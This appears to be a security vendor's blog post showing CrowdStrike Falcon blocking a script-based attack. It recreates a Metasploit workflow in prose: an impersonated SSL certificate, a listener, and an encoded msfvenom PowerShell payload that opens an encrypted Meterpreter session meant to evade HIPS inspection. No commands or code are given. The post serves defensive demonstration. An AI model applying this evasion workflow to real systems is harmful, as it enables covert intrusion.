Fileless and script based attacks are on the rise. The growth in this area is attributed to their avoidance capability. These attacks avoid detection by traditional AV solutions. In an article written by pentestlab.blog the author illustrates how a simple script in a widely available tool, can bypass security measures. In this article we’ll illustrate Falcon using multiple detection capabilities to prevents script-based attacks.
For this article we’ve replicated the script used in the blog. Then we’ll attempt to run the script on host protected by Falcon. To do this, I used an updated version of Kali linux and a host running Windows 7.
Step 1: Generate a Certificate
The script generated is an encoded powershell command that establishes an encrypted connection from the target back to the attacker. This encryption prevents a HIPS system from inspecting the packets.
The following steps are directly from the blog posted by pentestlab.blog
To generate a certificate for the encrypted channel I used the Metasploit module, impersonate_ssl and choose a common domain to impersonate. Once complete verify that the file generated is on the desktop.
Step 2: Configure the Listener
This step isn’t in the same order as the original article but the accomplishes the goal. Once the payload is executed (I’ll create the payload in the next step) an encrypted session between the victim and attacker will be created. This will prevent HIPS from inspection, and any protection it may have provided.
Step 3: Generate a Payload
Metasploit MsfVenom is used to generate a payload. In this case the payload is an encrypted PowerShell script. This payload leverages the certificate generated in step 1.
How Falcon Protects Against Script-based Attacks
The Falcon Platform is a single agent with multiple functionality. In this scenario I’ll use the Falcon Prevent capabilities to identify what this threat is trying to accomplish.
In the alert below we see a process tree to get a clear idea of how this attack works and what it’s trying to accomplish. We can see that explorer.exe launches a command prompt and in that command prompt we see the command line opens the batch script created in Metasploit.
Looking at the next two step we see that the new command prompt calls PowerShell and then runs an encoded command. The subsequent PowerShell process is the same encoded process running.
Finally, the last process is the attempted execution of the encoded script. In this instance there are 3 separate behaviors that are suspicious, although Falcon only needs one to prevent. The green text indicates a suspicious process was identified and prevented. Next Falcon recognizes that there was an encoded command in PowerShell and this is suspicious. Finally the presence of Metasploit’s meterpreter is identified and was loaded into a process.
On the right, in the details pane, we get additional information on what the script was trying to accomplish. The network operations section identifies the attacker server and that communications were over port 443. In the Disk Operations a list of all the DLLs and files read, and written to disk, are available for further investigation.
Script based and other fileless attacks are on the rise because they can avoid detection by both new and old detection capabilities. CrowdStrike utilizes many types of detections methods to both identify and stop the broad range of attack vectors utilized today.